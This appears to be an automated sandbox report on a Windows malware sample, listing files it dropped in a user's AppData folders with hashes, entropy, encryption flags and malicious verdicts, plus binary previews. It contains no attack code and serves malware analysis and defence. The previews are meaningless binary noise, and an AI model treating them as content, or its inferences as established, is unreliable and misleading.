                  SHA-256:0AFB3EDA7F889F955ECD41888D6A003D5A73C38DB526CFA49FD44B0E5DBC63F5
                  SHA-512:78011069AA5A771806AF05ABDB1282EBCA5147A435DD9396D9822969B9F072135B1F607DE956A98F7B4FD5FBFFB8227783165BE3E4D75F018D5E517753371178
                  Malicious:false
                  Preview:regfD...x..&....n,..h......P.<,.K...+.kc_!S5RXV.....0u.G.<..W.dS.c^...!.&PC.....^7K.8...w..]..K..}..:.....{.......,)...#d.;....g....{y......E.RaB3.x..T...}.M.S.rT...<..0..s.s.!..h.+....Q........k[..d.k6.kcR;..>..U.4.A..H.?.~.\.o.Im....:x.|o........D-oM......xD.|..i..I.5z.l ...n.u..n.4C.E.F..%*n".q(J$.@.<.}.@...-.Ck.1....}..;R.)....^..e.,...'SK....U.%,..6.CZ.......|[I=.....v......i.i...;....q....[htd.oB"....."U....HAmj............'lU+.S&.3.e.Q..l.C..{.|..5.....k.......&yzk.........N...=...i.L..*...@..G..6x..4..%19n@.....5....yksR.<IP....2.......z;`.....Tc....i$..w....l.z.9....{,.P.e..C...&`_yM$Om>.l~.k..?..8...{H..N...o...ZL.S4.O...\...4.P..O...].j....?.sd...5_.....#*.|{.MW6............M/`:...Oe..9.dz.....^.p5.o...4.y.[.=v.S...1!......M.......e...L,..;.E.I.%..|..k6KLA.{=VY..{..E]..w../.LL.........'...<.r..8..B.J......q....S.gw .X.Am...../w..x.......X...k._.?..X.0.......{..?.X..]...l.~..R.<..^...YI.g.b.g....A@...Q...!K*..../Q..;?4....

                  C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):865614
                  Entropy (8bit):4.097782130105416
                  Encrypted:false
                  SSDEEP:12288:RY50ikpF2ZZJC6JZ2yfZyWeI4VTZZZZJC6JZ2kZZZJC6JZ2zrZZJC6JZ2x:RYmie
                  MD5:8DEDA57E5927454565F1E0CBC5E2225B
                  SHA1:09627B3A0BC8A4F63E21B042352B4C0E7A59CD7C
                  SHA-256:1DEA7B829D0B61E724CE1001869B81513F6EDA0C18FC0351B6C5E286AD2BE700
                  SHA-512:31A327093CED2030D7AB6DA4FCCFBB095D3BBC3010D624415B3DF1CC33270B3DC81AD8C4578D84AD69E9A58D734CCF133D5AD48EA47EB23221C14D367F7FE5F0
                  Malicious:false
                  Preview:regfCD...M.l....57.........'.#X..N".."mo......uV.*.z%p.pQ....#.R..:5.W......\;.%.$.e.6..r.d=.*..%<....Vq\.0B..)....6D.....t.X........o.Z.fh4.L..GM[..U..k'@a.4..Y.....T-.+..2u..c0.;......e...-c..L..1.Z.t.A&.P.p....._]....#9."}.&..9qCO...........R..^D.?.].....j{.$c.B|..;<<:...T.L..LT.%G.N.A.K...~"70f.....s.Y..O...H.H/..\E...vFe.".b.5.{~Ye...(R...E..r*.J ..SBc.m..e.K.(.wHS.......(..."....&.F..O......T..5..eJ....+..g$..|).e)7.,..qvx3.( . ...Fme.........b...*...~R...iH..*......#@..o...LJ.Z:p.......vK.Un....5x.#......x./@V.>...y.".O..vzJ~.8.Yn<..0...2R....;...k3,._6..S.l..q.yR.-.zJ../.1l...V..#.GS.Y...c+q..?.#A..j..`.5E..0..v....;.../._r..$......9..C..y.A......^...F.wP......H.......).........}V..HT..i......l...a.Ln....u.#.......C....(.r.t.d.....U..=,.`...6.&... 7:.h.W.d^....^.......e?..~......|....+......VN..MN.RB".t^.O.....N..J=.!J...G-..l...cE....`.UJ_.\....V.-.$.....8_?.e....x...p.*e.p..O..aZ.....{ ....z.u.c....,.*@...2.v..U.g.5.6.iQ[<

                  C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):865614
                  Entropy (8bit):4.8148839123741025
                  Encrypted:false
                  SSDEEP:6144:QicauC747V0uGKGZjUowb26scpbJ6JZ2CM2C6JZ2g:QiEGuXGWoUJ6JZ2CM2C6JZ2g
                  MD5:0EFC0D4833EE3919510BBD07D26244F4
                  SHA1:D570AE1EE81B0D76A78239FE8DBF265C7A6F54EF
                  SHA-256:F709290AB133563EB8B9F8BA0BFE143DA0F515D86D4CF215F592C9A80DCC5898
                  SHA-512:75F6753DA24E308498B21F345319119F4CBFECEF2EAAA44945CD2B2C1DC1BD7D70F0AC9EDE9F571F52FCACF8CF180FBD5D53A1DA9C09194C6588CB87BD11D1F3
                  Malicious:false
                  Preview:regf-.M0.D-...-".3.%......l^.i........gd.Dm.a...0...B...../."y>...*...m>.....4&B..u.]...b.\9.hlo..... F..S.9..Z.P.L....^...&.-....../...".S.....L;........,..H.........Y..Z....\.C.P...s.d+....D..,.'||(......V.....R..Mkg....d......!....>'Y.d...;(..01............l.h......O.OJ...7....i.!D.c/../......c.........r.v.pLu.^.v.W~3-........}.{'.o...;....e-.......u...m.\wpP.].^..s]:.<hDO.C^V....z..0.................+.7O...D9..-.$..Y.&. ..k.U..v.L....@...cD^|..,.E.........0e`g.p...|.zB..F.A..\.......U...#....s...).f.\...R.....Q0..=._ ...l`^..2?..{...le..@....^....$.Z...M..&.H.5......FI.s2G..2.{.0..soo'..w.U.5..R^.P.+....'.....u......,.NZ.EG..oq.yk~.:..A.I..u..k..V...#&.@..1?.....V.:..`..U.......O.7....wdknd.E....D...\6.)..0...;p.rI.|......_..Ws<...~xx9|...5.....h?..'....<{..$.s.*..l....)X.....T..}..'0..t......&.....RB...3hE..=..{.v..bWg..e./(........^..9,..j.....8.N.......N...k.<....).~'....b/.....41..Z....;..v?..(#3.<...-..e.........Ui.\l.3..2.

                  C:\Users\jones\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.9937003778969755
                  Encrypted:true
                  SSDEEP:384:CxCVJtQG4hkPV6QC4xdD3fFWkkrN1vDxHpNfHujEttxbUU35kGWS3Y+Ye6ZCkHHX:EUDrPVDr3NKrvt7fOjg+a5kGWSZIH3
                  MD5:9CC830188B57DC94F6D4EE1B13271E4A
                  SHA1:848FAEFBDBECE682B792432A39EF7F5BFA4745C8
                  SHA-256:1896957005F887D0B1B2B0306244BF8358C25FE32F7062B6C68BA1E1B05D0F5D
                  SHA-512:0FA8E12CC339CF4B2583EC4A2ABD0584DE30BC622E69FD2E569DB78311CD23BDF8D144F4A3A38EF97E6E876549612150385ABEAD5621B9A7285A5F0B3D0D2A96
                  Malicious:true
                  Preview:SQLit.%AwneK.`.~.L-)..GJ_=[9.."E...O.a.e..*....G.DU.....4.P.odq.Xt.Q..Qm..I.Q/Q.f5@.h..W.:....m....g.F4;...d.T+}5w....s...|.?.mh...PUJ..UA...Pf..|..../)....|X....c..M@AZ-[e.....+...[....~!J. .f...sg.6_B..e.R. ./..(.z.4jI.a....H...l.!.\QVOs..Ps.aC.&.v.....I....0.?H...6u....v..Epc.Pe3.n6j~K...1.O..Q.U(....]9....J.W/...1...Io........^..].*s...Y..f.i..5.|=:...n.<..dJR-.r....+.....PqYHO.....2...$...z..A&.u.Hx...q......$8....?.;..&.u..z..w.HIsS...~.?&.-.....].<.x.R.M?......LK..Y......4.r..P.,.D..Z.n8...b.........]%.$I..b..).'..7X....Mi...b....?..j2.cg... |...%.E....nv.N...e..|..Ki#..=4..\.DG..'.v.G..3..j. ....0..7..m.....b.g..b...\Th.j..G..Z.C..z........j.=.h.jv..[zW.b.V....j..J.u.vv.P.m..dj.p......1.igs.].F.V.}s..c..y...Y..s...qN..D....O.!.......(u.H<.|..!.vW....C.{...../.V.3W.+...).lv.+?)...h..E......e..6j..AW~..W..E....|.L..H..\...P8..q:*..F.L.6.o.....f.wo.2...Jg.".'..:BJa;=...}.S.Ax...mI..Y.._D..X.=.`^S.F.:T...~...}.....X.......1...TI...<..b

                  C:\Users\jones\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997302385520275
                  Encrypted:true
                  SSDEEP:1536:vIGjFQlhC5ExvFr33RYQDXi9w9wGmqNmSgs83PaMS8tI:h5dExdlYoiQMSg3ZS8tI
                  MD5:ABF2B4DABD62D20D43E44F6388DC5786
                  SHA1:A2FB3AEC888EE79FAA84781D94A074E5ABB78CB0
                  SHA-256:E9B6C6C207693DC5E9F9CCD0336CAE77DE0845539854F1C0107BABC2AB867069
                  SHA-512:AD2005DF19EB36A014CC5889C94967F7C4501617D5ECEDB1EA2E4D330D54593972EF34CF3EA2E3107854BE362FA86A818D24D8E4BFD9C3312B98C5562E53413B
                  Malicious:true
                  Preview:1G.f.L.Hx..b.14}....7.A.........xE........W<m..f....^W..W...DJ.{.i......e.....(..LwW w.F.u.E..H..%f.U..Rs....<.$...........L....m{.>.|...o6...a7._.....?...x...Q..O.$E.u..J.^.U.......j."f|.p... ....[1........m.....XJ.....^:u.p.K...........d....j.......9Rr<....st.ey.XN..5et......d..Hc..2\_.Q...&AJ.....)A_z.B.......Uv..<....+..A.>Y...E.g\....1w.E..d.h....-.\).#r..%....C[..-..:Q.1..Zq.Q\...=.6.....i!.....S.~.N..u..9...\.xh[2....8.....D>.....G.......e.....zyi......]W.Z.....x....Q...L......oZ..a^.W.`C.....3..f.F.\....i.K..es=..F4.....9."i...cN..d..c(V.)..R.^..........$95..*9.V.L.\..f.f.s.................B...Je..T.<.jm....+.:...{;..rRXx....!*.F.J....J1......oKc.....<A[.#.-..P.$..U4Tq.......v.t...D%.A..b..*..T@.G=T/.=...n..O/..M.....v..`..........I. ....."A.#....-.....%JE.o...g...,.TD..Z..P+!..I?.....1...'.k..^.0i..c.G.<..1C..37#..9...=......Y..OmM:+....R.l..m.5.^r..I.T.z<\.h.W$ZP^.W.C8.3.o..T^...>'o.@..DZ...[..T....0..........t..NA..k....m.r@.

                  C:\Users\jones\AppData\Local\Temp\AdobeARM.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5101
                  Entropy (8bit):7.96340827956018
                  Encrypted:false
                  SSDEEP:96:oIYOGGn+sjwP35ktesLrEUew3cgsz7vuatTcjgl91UhvkfDCIPO45lTF8SCdVn:XYY+s8PJw9rEUemOfGje1rDHbF8SCzn
                  MD5:7A0E5D92F775D79E3D21F1D8DC200FFA
                  SHA1:5ABF34F3D6BAC8BC26035412C0453200F8BCF3A9
                  SHA-256:A96F8C0ABDBEADB89DC0DE67E323FCC11D380DDB2BCD25E5926966C8849A122B
                  SHA-512:DFE4BD37C3C23CF36D708D2DA52642AE72106D07ED3651388C1DA01D77435D896DCE195EB1F36D28BA54A3E021A50D2CF227ECB8F988ABBAC880C1E157FB38A5
                  Malicious:false
                  Preview:[2023..oW..}..4v......".....}....rZ.*!.:.3..+.#..E.SP...a.5.z%....G..Hoi...G.....&.T".#gug.8.w...,.."[~.2.3.d......6..X+.......A.`...xD@.<.;..VD.A..;k..7.i.oN..m.0...,......%..qU99..(jd....Gz..-...!.OW9.:VT...S..C..O..M\'...U Kx..oi....W.M...r.......^!..^@.......y.i..,.,)..t;...ct...m&...d...`.M..|#\.eQ.....IH ..l....z.y.i.Ii....N:....).E.3q..b...3hA7..T..S.I..Y...v;..x..v.N0.;);...Sr.>.q.....fvB.F#w.:.50j...<5.F5..........Q.kj?..ei.'r(....7.b.`....j[9..Y.......9B7n...g.....G.R..........Y.O.)...-2...+....n.........!.jS.q#.oU[..`^.s..p.*..?.C([<<_hv../....\"q....8...t.*M...XA..S...j:8P......C.V.....K./.DC.$...^.........`mX...zmX{%D.w4.j.:r._......*.....l........?...}.4.,....s..Q6ML2..*..1?F...*..JDDA.M........}.j!.Jn..!...]..#..a...J>.K......t...M..b3}..H..#.Q_V..G......i_h....P.Z.4..h.3.......'.Xr.+XgE.....FP..d..b@.....c..Q(.g......p~K..q-....~..Tt.y.&.._"."}.N..........W....:......3.f.............kiY..`._..X%.a.,...o..Z....s

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):42850
                  Entropy (8bit):7.995481854711741
                  Encrypted:true
                  SSDEEP:768:+FJdckQDavnMRBVScc6evO16psJUnVmPkzkXiGNmicYolgCw2SKuUjHOrnoKziD8:OckdMRGCTcpZMSgiG4coc2SKhjHOJuD8
                  MD5:95E2C25D1C1A08F4183EE0FCB86C1AE7
                  SHA1:13B51393CCA8EA40E2532562C8E9CC1438B39BDD
                  SHA-256:727BB641F9D2012C86BA57DDF0EAB42DFE2768B75B72C8B6544174AF8C72BB40
                  SHA-512:A6C010E2994E80D128415CB839B72036A4A069AFDF9C75CB5AD25810D1A983CF95D8A54EFFD59CF948C6AB51CF9F54B98ACD1CAFBCECD12CBCAEBB6B8C5EF53F
                  Malicious:true
                  Preview:..T.i.k....t..u.dc..z.r..b..:s..\.@`N....r.H)Kp>.:S~..P.~....W.mOpP......!K.s....y$.?...P....H..x...$]@.........:b.....?...|..?.*....0v:6.+.d.sV......v........ .?.\...}.R..\px.k@.........(..5_.!......x.....[r1z...*T........A....~fTlZ.[..$...4._.......e...X........]?WPl....Q.=PF.}[..f...Y@....A.....n"E...g.Sk_.../d7~(..L.(2k...&.Hl...Q`..bX.]...!..-..b...fMe...Z...`.a...B..;.$....\.._..1.B...!5.J'+....N&....b.w.,.&].}...).OL...aN...........j.}H..g...Ek>..j.e....(.Rf* .vj......6:{*/_.ME.6..?.V..?.`...;g...Q...IQ:.$.>\..G..B..+.............nlt..O..I........*.-..,...??. .....E..B .1.-P.QO4..\...M....z.Z.:r..#.90....TL..k..?H..v{.X...=..C...3.I.BA..V.h.P..Q.a..|............@..,GYswi......i.....{z.C.b._...6..Suw.\E...t..qpWq.....fY6 .Vv...V....0`...Fq..........;9s.b... T.t....p.b..>...cb.Q..E<d.g.^%K.....5c..u..W....|b.2..nc.T).7....*e..K...(...}.r...Y..+..U..'...5.+....b........+kq..u...A$pN.C~Z..B.e..h..$..&..$...2.*.....M*%o.#.D.../

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258a.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):462288
                  Entropy (8bit):5.851075241826565
                  Encrypted:false
                  SSDEEP:3072:iL2m0OfAvyG/dby6pEI9IN0nFbsH22xVS8eDo5UaMHebvAx3tjhfF1c/UU/kujtI:BOf5GxyIhnYW2jS8JfG9jFFuc20
                  MD5:E0CF186F80ED630001CCEF0C0032FB7D
                  SHA1:6361A969F899D8B5A3BA6989052E4D6016C93393
                  SHA-256:B8140104ACC27EEFE952712A514BB82D5261FD1DE04505F28CCE63E9B5996358
                  SHA-512:A2B594E26D1367A2DD479E31B122D229AB290F18DA53EA9CF5CEBD79D10D23BA97918B7163856D6E84B358D06B02C79F60358D98E9FE0322F6ED154BC2648A55
                  Malicious:false
                  Preview:..T.i|FwP...O.JQ.#.........1..s.._3..>..t.......S......a~q^.....H.*..!M....$.zK..{I.H..........TKL..~>..r.<.d.@.r..........Dg>..3....C@.......5.a..t...p........ ..w...M..-..H..$5T...!*J....._".<..&.Xa..BS.(..(.?.L......<Q.\s.mp.L..1M......%J.....m..^B......96.{........P.).&....S2~.#mm!..a...;...V.F.&.J.....f...{1....j..U'....gr..3...V!.'.....E.f<.N#......<4@Q.X...Plv.Bt..(K....2../........y1c.<2.S...D.....O.z..`.}&... ........zO...^.....(..}.+t...=..vf.*{.a+..4...z.I.*.Z&$.....$v.%....F._Hz..5n=#..@...#.Rs\e..l|...96}.X[.Wl.D..Q".........n.y..gH...|+.}....5a........Z..RD.>\K.......qN.t!.C.vs...P.....0".J.O...+mC9~.c2..[.=..Q.W.K.*.d.\C..Qw..g.. .{.O..R.'?.x....c.....}V..z.0..i.3L}..AAk>..R_...YQ.0ze~M...!..".&B.......@g..w(...d..C.u....p&...?..........)mK...H...,..k/..%:e......;..E.7|...3....O9.)rS.Q...p..8X^..2g...kr.es<.P.'3..X.`P...S...v...ax.2OV-..0(..;r..pN..5.q..*..P-)Fov.>.......HL.V...DH..#....y.<.......E..g....yS.k

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258b.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289976
                  Entropy (8bit):6.696255604343023
                  Encrypted:false
                  SSDEEP:6144:SWopxjp3sCkgPV676u6QzIcGnivkuX0b39/22ZOKyymLe9qDOey1CAXYa8AHYGAB:SvPNsCF2zIcGnivkuX0b39/22ZOKyymV
                  MD5:7CFC3B17BE969197B7E263C561C351CE
                  SHA1:BF8C0702707289F514C88C42ECECF9976B393B21
                  SHA-256:210EAF67FE7637942F2EE8A1360143869625A834E42DFBAD9876C0FAD2C2CD4A
                  SHA-512:C07E351456C7D933DB7449FA399F9E55FE0B6201AF6E58AF1C8AE53C6C858530DD393B37E7A002B23D7B466ABB3CA16EB82E72AF9F8418279CF04037C755AB6F
                  Malicious:false
                  Preview:..T.i.s.......~"2.6.p.cj. .U...Hd..ps5.&!.....1ow1..G..T.s.@.L..K...@..P..Tl..(...m.'.YN.!D.{s..rl...G.n.%.../H..D.i...RhU..MS..ZI.V].2a7mN...4..K...`.wr|...i......2...0.}q(..{/.f.r.Nm......C.R..ZD..07..Qg..r[.4.......g.1..y..{8..<,R..#.......L`.@..x.e...&Xtq.>.r.#sL.3.<RTl.={./e.&R2..C.!0.vr....Hz.X$e..^@_.A..,..0@^uq:.<^^.....R...!x9A.x*..B...cQ..g.1...D.D.=...^2B...?....o0I...:......\h...<U..o^.;#....K.6....8m;Q.. k`....27[..v;.h....!UA2q(.....N6.B..d6X.....I... L~....2.m.Tp.............a0.....(.. ...K.D.p~.>l...D.......,..O.........l..;.p..`..i.wR..\*(".....U/..9.EU7V.-I8x.3Cv........F.Y.L..d.?..XIBn.n"..8*l...P=.n.>%...=.S@...j...'....fw...].8.ic.....q......qx7..+K..C....P.f.ZJ!..&H...&7..g.`.7.x....+@)XJ.+......).d{..B.7.nm.*r.........,...{....V..&R.^..Tsv~R!6....K..N?.. ..0...Z-8!..L...wHh..M>...IB?.$...CZ......T.~.qK*.cJ....O....s`..3.l...D....].EL......c..|y.F.........z.Rzd..?h]ty+.j.[Ne.T.Ou.e....>..6.............d4

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258c.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):98568
                  Entropy (8bit):7.998222967720194
                  Encrypted:true
                  SSDEEP:3072:Y9HfNqNqZPp93TBAn8yZUwqCi7Y9TyaL3s:Y5fENqDXA8oEYZ8
                  MD5:760E616B33F51FC23C5BAFBD342199AE
                  SHA1:7B324E45FBA831DBADF6F4E389BFA2B5B6387758
                  SHA-256:A642BFB51F8FFDA41080B1A7526B84230954B263223CA9DA67A0581E86FEB1EE
                  SHA-512:E5405C90FEF26C916C7C97058E52DA9EEAD34140DB3B6ED7604063DD305088A8B9F49F4CE69B48E0F208B6F87D4880D50CAEEC88AE4C275FA43AF25343E13015
                  Malicious:true
                  Preview:..T.i.}..tw1^....}t..........'...O....ynr.`..>..q....uhg.V....Lth.>o......j......+.....|l..\.....H!j.9u.U..m......5.d.1.bZ..r...8.b.K.(\...~.\.n...^....uch%.a.......A...=......=.l.....d%...w.6...'..E....T...88...J.U.x......X3.['.&?..,.y....z..)D..s..E.5.9.R!..U.....V.....h....m..r.d....im.+.$i.(....GD.2T..5..(.....A....;.L.pY.......n.B......W...hG*.\E.XM.fP....X..L._.....^...........?.%=.gW..v.)q...!B.;.j.1.Q..t...K......cT..h.Ai....8~K.e...9O/../....7.l.vRe.....F...kV.Zv.VB.*..T)*.f.?.=i}.3..nc..........-j.h..1.oiF..}..luk.S*!.Y..^L..J.b.=.G.n^,..3.. ...-.......Q..&..G..r.i...M.xc.9./.#....0...F..f.fic...%.&.B.h.G-:......G:.O.!m...j.......A........NTm.d.........w....t..._.g....+..=.J..?GX...XU.:.e~Wt.l...VP....x..4..[....A..z.R.g...M...0^{........Ei.a.Bj..O....#..A1..X.._..U`........A........%.-...7~*R.h..Q...nj..Z...w......... ..?.Y..F3t.m.py.5jH.s`.....3._._H|~1.O..W..R.kk$...).V...v..QsF....r........IH.*$.`(/...#..p;.....(.....\QCA'..9.o..

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1305.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):395914
                  Entropy (8bit):6.098834636098755
                  Encrypted:false
                  SSDEEP:6144:N9P1SSRDVBaU/lFGXelpCw76dRS9z3PQ3O:rP1LDjN1XCwJ3Y3O
                  MD5:99BA92126B175214C20F4D5C709123BC
                  SHA1:BB6476088A28FD31A771C49C40DD3F7D76DC6E17
                  SHA-256:9B8B9AA44375AB4DE8F0824E6DE835B79580F08A53D6E9D0C4955E5EDBA2A71A
                  SHA-512:B59E5DBB3A70D149DC433018D8B27E12F767EB37DD570BA58BB01EEE1FD99112ECE0B05CCFEF5934ABE71FAA2CAE809B27B0017B6A3065CF92842374EF74AB7C
                  Malicious:false
                  Preview:..T.iu.k.,r..K.%.+U.G.A.5y<i]..%..w$p...z.YP.a,..u0....&...,pQk..?....Tt8.-.~I.h..{Jx?.ti....a;.DU.5...FI')KJ..+.."....=.D...5.g.Q..0.4-.dz.A!...N.\.........*...J..l........C..e.N.,.6.Q.........SR.m.n..4...$../.....<...U.K..`+...E.."...Xg.E?/....g.&.d\....._...~.....F.$...w.fr..!aW...6)..C...C.&F.!..{y.)p.(k..x.Cg.y......'..D..>.b...XmIC.....S.:..........%[.....LR.:......v.......W.K...,...1.-.......6iM..}..".$.m.L..!OE.M..).(.+....$...^7.@...o.f. J.d....7...K.nM..#.]..w.\..4.9O....7..L.C....g..N.j..t..%..i,~..il...Ce..y=!1.E..Qg. ....S6..A.k........D-.!.[s.....C..r..Y?.....S.?........Ln.F.X...yg.".FY..Ox[..$I....q.5...Sr.... ;..;5:.oR..q.E./8.....f..7.M.s5.......T.....].Z.z.C./.:H3....~.0...!..8.-.X@.EY.C...>..."m...D........s.{....IS=.0.......m..,.*...&.j..7.#..M.L....s...[$.L....X..[.z.6....r_'+.;..o.>}Yb....J<(.L...........KQ..^.z..\.h@...V' )z..7.N.q....X..i;.e.k..]!....r...s..../....{....yjEo...g]...qN.v/.E.^k..X...pnT)....J..p7{bE.

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1309.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):138356
                  Entropy (8bit):7.998814847468252
                  Encrypted:true
                  SSDEEP:3072:arGpajnjkvkpyhBQha8bo3p4FstKjAKKziU1t30trIqfYBbCmy:Mnjkvk6OaSGWR0KKia3srIqsG
                  MD5:B2842EA1AB9704A15D263C30D7BE8E2F
                  SHA1:483136DD651B26D8E5F1F4F747B06A82D553F2CD
                  SHA-256:A61B3688D3E53D24918115A317AF8D34BD09ED511216E8ABED830D90B1E7951F
                  SHA-512:5A6EDEDE074E3B7258E45CF4EED3DC41D51B35713AAE6CF1967B6D9C807FE844DC4425AF1362B28043D542BD5B5510E575BA0B491B98186FC771D20C50E9BABA
                  Malicious:true
                  Preview:..T.i&...7.[...}4g;..c...3....GQm<.....|.........m.q.i....!.,^@....L.....5...1.....r).Q...b.w..Q`9.E,....E%r...1I.n.m{(..F..O?.p.......z..T.W.k....L}.#[.gH.........%.<......mS..D.p..!Tw.p<......_...........?.t>X...y}.^.r;.BT.....'....=b.%2L.F(......g.dA7..3pB1@N.P.&......S..?...(8..I..s..$S...../...i...V...1.....k+..f2.1w.#.......@/*.en&...{..T..JA8:.M.l3A.?7../...~..j%...........D..n..U3.{.<`V6..pf....\..X..t...#..C...&.^..b.T-...t=..6..m..3.,.1..........@.7.7...........b.+...X&*.....N....N.:..Lx,....gRj-Qz...|5=.G.&K..C.g..X..=.......15...2......w..z.....4..z..;w..5...[1.=..GT..m[?....M...`C.Az....>)*[..p...v..(9j."....05\a...g...eE?...t[..*..X._.)./.e.A\...[.Ewv...GO?.HK~,m..*64>..w.Z.:.C.X..o...&l...F.h.[.C.p~....7.C."..G$..p...`.w...~d.XI......vW.e......2.......z.>g.K......K.t..v.>..u..x.p.......8..=..jSP-.......lh..89.H...4.!o|.g|....{......z@+.c.fN<Vj..4 =......-.O..)..O.m.r/).@.>}.%...5....(Ha@7.E...Z.b.$v...)..g.......J.9....9.=..

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9798
                  Entropy (8bit):7.977354757266449
                  Encrypted:false
                  SSDEEP:192:3I4Wuo4SOvw6aVJrsem8UKisAxBTiemey8MOCo3Ce/:BWpb/3fw5rxBTieXy8NCe/
                  MD5:0C056CD2DFC1B398647255EEA00D17C4
                  SHA1:11036E557F84B44EC19EDDD0939A31F303D9D3DD
                  SHA-256:5517AE6D1A703F4D8F8DE31ED97BE58E35D4E72A30C86AA674A1B0A38100BF42
                  SHA-512:E6F4E3631810285AE3DD8575EDA07569E5C90B416B8A97A7B10A18168E9E22AD1032891E972D34E6459B1972C233E0C54E6882D7136D76547FA9191AFD6E2A62
                  Malicious:false
                  Preview:..T.i..d...Oj...f.wV..<G.P!.|..^..$;h...FJDy.....{..k$.6.}...v..h...0 .~...)...:}...*...17(..vg...!j..$.....M|........3=g.....L....J_...wz...6.P..$x^y/.....o..DW.]M+.(....`.l.=.....N.(..;g..~.........u.2g.x..p..8:~b..(|w.....0...u.....b..h...gqMI.&.@l`.y....H)9....G.1G...U.........$.].W1.&....Q.(nw2o.t.......<.R...^.S[..6+......H])/.Z... y..,-..;....$.'......u.*.S...1.....T.C..j.H.%Y...H5.7O.i.xo6i........h...q....[.q1K....R.T....2...'P.."E..)3F.$..!.X]...U....9..W.?...../(.g|L.~rRH&.@.$..d.M,...DU.....N....g.8......;..(....iEo.V...g....+..W?....`...[F..Y=...7.d.........V.8`...q....:)m....0K{|A..\88=,.....=...vP..m=..1.9....A...7.%.. .B7nN..."..$....&.#.i.....E.....HW..^a.M...1..?....J.b...p.8......i..L....K...0.*.J,..T.f..T..*.$.0N("`*...K)T...2=.....x......_....0...~...j.>..T.,p'.DT.2A.8..U...\.7....[..,.:.d.o..C...]h.ddN....F..g.qf%...v[fH.{I....%.eKn%........p5b.V......9."S.t...".....Y4x;n...8....<....{?...a]\C...Q....k..

                  C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929a.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):58820
                  Entropy (8bit):7.99752330719469
                  Encrypted:true
                  SSDEEP:1536:lmnTUmd/2G6S5CMzUOF3DmZrWgf0asfwlU1XuG0o6iGsA:mTX2G6I3z/yZZkYlU1IP
                  MD5:AC0FA0774D3D959DCA28C7556D68A319
                  SHA1:53C37DA85517A583F3DEA736AA2DA657BA8A5B47
                  SHA-256:83098D4529D11821F2A2F0202B98179D6BFE46E7707862BDFA226C2073ED29F0
                  SHA-512:3F86A55AF7A08FA34DED1A2914E5CDC1F2424FA7CD2E4AA7379CBE0CAB93E2FDA9874E8DA9425616FBF4A98367793E94C15304FC9D274DB2E814E1DC7A9A6608
                  Malicious:true
